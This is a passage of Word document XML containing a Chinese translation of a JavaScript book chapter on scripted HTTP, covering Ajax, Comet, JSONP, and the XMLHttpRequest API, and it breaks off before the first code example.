        <w:t>是可行的。当用脚本设置</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>属性或调用表单对象的</w:t>
      </w:r>
      <w:r>
        <w:t>submit()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时，都会初始化</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求。在这两种情况下，浏览器会加载新页面。这种用脚本控制</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>的方法在多框架页面中非常有用，但这并非我们在此讨论的主题。相反，</w:t>
      </w:r>
      <w:r>
        <w:t>本章会说明在没有导致</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器重新加载任何窗口或窗体的内容情况下，脚本如何实现</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器与服务器之间的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>术语</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>描述了一种主要使用脚本操纵</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用架构</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>应用的主要特点是使用脚本操纵</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器进行数据交换，不会导致页面重载。避免页面重载（这是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>初期的标准做法）的能力使</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用感觉更像传统的桌面应用。</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>技术把用户的交互数据记录到服务器中；也可以开始只显示简单页面，之后按需加载额外的数据和页面组件来提升应用的启动时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>和使用脚本操纵</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用架构相关的术语</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>。在某种意义上，</w:t>
      </w:r>
      <w:r>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>相反。在</w:t>
      </w:r>
      <w:r>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器发起通信并异步发送消息到客户端。如果</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用需要响应服务端发送的消息，则它会使用</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>技术发送或请求数据。在</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>中，客户端从服务端</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>拉</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>数据，而在</w:t>
      </w:r>
      <w:r>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>中，服务端向客户端</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>推</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>数据。</w:t>
      </w:r>
      <w:r>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>还包括其他名词（如</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>服务器推</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>推</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>流</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>的方式有很多种，而这些底层的实现有时称为传输协议（</w:t>
      </w:r>
      <w:r>
        <w:t>transport</w:t>
      </w:r>
      <w:r>
        <w:t>）。例如，＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
      <w:r>
        <w:t>有一个</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性。当脚本设置这个属性为</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>时，浏览器发起的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求会从这个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>下载图片。因此，脚本通过设置＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性，且把信息作为图片</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的查询字符串部分，就把能经过编码信息传递给</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器。</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器实际上必须返回某个图片来作为请求结果，但它一定要不可见：例如，一个</w:t>
      </w:r>
      <w:r>
        <w:t>1×1</w:t>
      </w:r>
      <w:r>
        <w:t>像素的透明图片</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素无法实现完整的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>传输协议，因为数据交换是单向的：客户端能发送数据到服务器，但服务器的响应一直是张图片导致客户端无法轻易从中提取信息。然而，＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元</w:t>
      </w:r>
      <w:r>
        <w:t>素更加强大，为了把＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞作为</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>传输协议使用，脚本首先要把发</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>送给</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器的信息编码到</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中，然后设置＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性为该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。服务器能创建一个包含响应内容的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档，并把它返回给</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器，并且在＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞中显示它。＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞需要对用户不可见，例如可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>隐藏它。脚本能通过遍历＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的文档对象来读取服务端的响应。注意，这种访问受限于</w:t>
      </w:r>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍的同源策略问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实际上，＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性能设置</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>并发起</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求。使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素实现脚本操纵</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>是非常吸引人的，因为它们可以跨域通信而不受限于同源策略。通常，使用基于＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>传输协议时，服务器的响应采用</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>编码（见</w:t>
      </w:r>
      <w:r>
        <w:t>6.9</w:t>
      </w:r>
      <w:r>
        <w:t>节）的数据格式，当执行脚本时，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解析器能自动将其</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>解码</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。由于它使用</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>数据格式，因此这种</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>传输协议也叫做</w:t>
      </w:r>
      <w:r>
        <w:t>"JSONP"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>虽然在＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞传输协议之上能实现</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>技术，但通常还有更简单的方式。一段时间以来，所有浏览器都支持</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象，它定</w:t>
      </w:r>
      <w:r>
        <w:t>义了用脚本操纵</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。除了常用的</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求，这个</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>还包含实现</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求的能力，同时它能用文本或</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的形式返回服务器的响应。虽然它名字叫</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest API</w:t>
      </w:r>
      <w:r>
        <w:t>，但并未没有限定只能使用</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档，它能获取任何类型的文</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>本文档。</w:t>
      </w:r>
      <w:r>
        <w:t>18.1</w:t>
      </w:r>
      <w:r>
        <w:t>节涵盖</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest API</w:t>
      </w:r>
      <w:r>
        <w:t>和本章的大部分。本章的大部分</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>示例都将使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象来实现协议方案，我们也将在</w:t>
      </w:r>
      <w:r>
        <w:t>18.2</w:t>
      </w:r>
      <w:r>
        <w:t>节演示如何使用基于＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞的传输协议，因为＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素有规避同源限</w:t>
      </w:r>
      <w:r>
        <w:t>制的能力。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>是可选的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"Ajax"</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>，这个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>）的主要客户端</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>在其名字中突出了</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>，并且后面我们将看到</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的其中一个属性叫</w:t>
      </w:r>
      <w:r>
        <w:t>responseXML</w:t>
      </w:r>
      <w:r>
        <w:t>。它看起来像说明</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>是用脚本操纵</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>的重要部分，但实际上它不是，这些名字只是</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>流行时的遗迹。当然，</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>技术能和</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档一起工作，但使用</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>只是一种选择，实际上很少使用。</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>规范列出了这个令人困惑名字的不足之处：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象名</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpReq</w:t>
      </w:r>
      <w:r>
        <w:t>uest</w:t>
      </w:r>
      <w:r>
        <w:t>是为了兼容</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>，虽然这个名字的每个部分都可能造成误导。首先，这个对象支持包括</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>在内的任何基于文本的格式。其次，它能用于</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t>请求（一些实现支持除了</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t>之外的协议，但规范不包括这些功能）。最后，它所支持的请求是一个广义概念，指的是对于定义的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>方法的涉及</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求或响应的所有活动。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>传输协议比</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>更精妙，但都需要客户端和服务器之间建立（必要时重新建立）连接，同时需要服务器保持连接处于打开状态，这样它才能够发送异步信息。隐藏的＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞能像</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>omet</w:t>
      </w:r>
      <w:r>
        <w:t>传输协议一样有用，例如，如果服务器以＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞中待执行的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的形式发送每条消息。实现</w:t>
      </w:r>
      <w:r>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>的一种更可靠跨平台方案是客户端建立一个和服务器的连接（使用</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>传输协议），同时服务器保持这个连接打开直到它需要推送一条消息。服务器每发送一条消息就关闭这个连接，这样可以确保客户端正确接收到消息。处理该消息之后，客户端马上为后续的消息推送建立一个新连接。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实现可靠的跨平台</w:t>
      </w:r>
      <w:r>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>传输协议是非常有挑战性的，所以大部分使用</w:t>
      </w:r>
      <w:r>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>架构的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用开发者依赖于像</w:t>
      </w:r>
      <w:r>
        <w:t>Dojo</w:t>
      </w:r>
      <w:r>
        <w:t>这样的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>框架</w:t>
      </w:r>
      <w:r>
        <w:t>库中的传输协议。在写本章时，浏览器正开始实现</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>相关草案中的</w:t>
      </w:r>
      <w:r>
        <w:t>Server-Sent</w:t>
      </w:r>
      <w:r>
        <w:t>事件，它用</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>对象的形式定义了简单的</w:t>
      </w:r>
      <w:r>
        <w:t>Comet API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>18.3</w:t>
      </w:r>
      <w:r>
        <w:t>节涵盖</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource API</w:t>
      </w:r>
      <w:r>
        <w:t>且演示了一个使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>实现的简单模拟示例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>之上构建更高级的通信协议是可行的。例如，这些客户端</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>服务器技术可以用做</w:t>
      </w:r>
      <w:r>
        <w:t>RPC</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>Remote Procedure Call</w:t>
      </w:r>
      <w:r>
        <w:t>，远程过程调用）机制或发布</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>订阅事件系统的基础。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>但是，本章不会介绍像上面这样更高级的协议，我们重</w:t>
      </w:r>
      <w:r>
        <w:t>点在能使</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>可用的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="451" w:name="18_1_Shi_Yong_XMLHttpRequest"/>
      <w:r>
        <w:t>18.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:bookmarkEnd w:id="451"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器在</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>类上定义了它们的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。这个类的每个实例都表示一个独立的请求</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>响应对，并且这个对象的属性和方法允许指定请求细节和提取响应数据。很多年前</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器就开始支持</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>，并且其</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>已经到了</w:t>
      </w:r>
      <w:r>
        <w:t>W3C</w:t>
      </w:r>
      <w:r>
        <w:t>制订标准的最后阶段。同时，</w:t>
      </w:r>
      <w:r>
        <w:t>W3C</w:t>
      </w:r>
      <w:r>
        <w:t>正在制订</w:t>
      </w:r>
      <w:r>
        <w:t>“2</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest”</w:t>
      </w:r>
      <w:r>
        <w:t>标准草案。本节涵盖</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>核心</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，也包括当前至少被两款浏览器支持的部分</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>标准草案（我们将其称为</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当然，使用这个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>必须做的第一件事就是实例化</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象：</w:t>
      </w:r>
    </w:p>
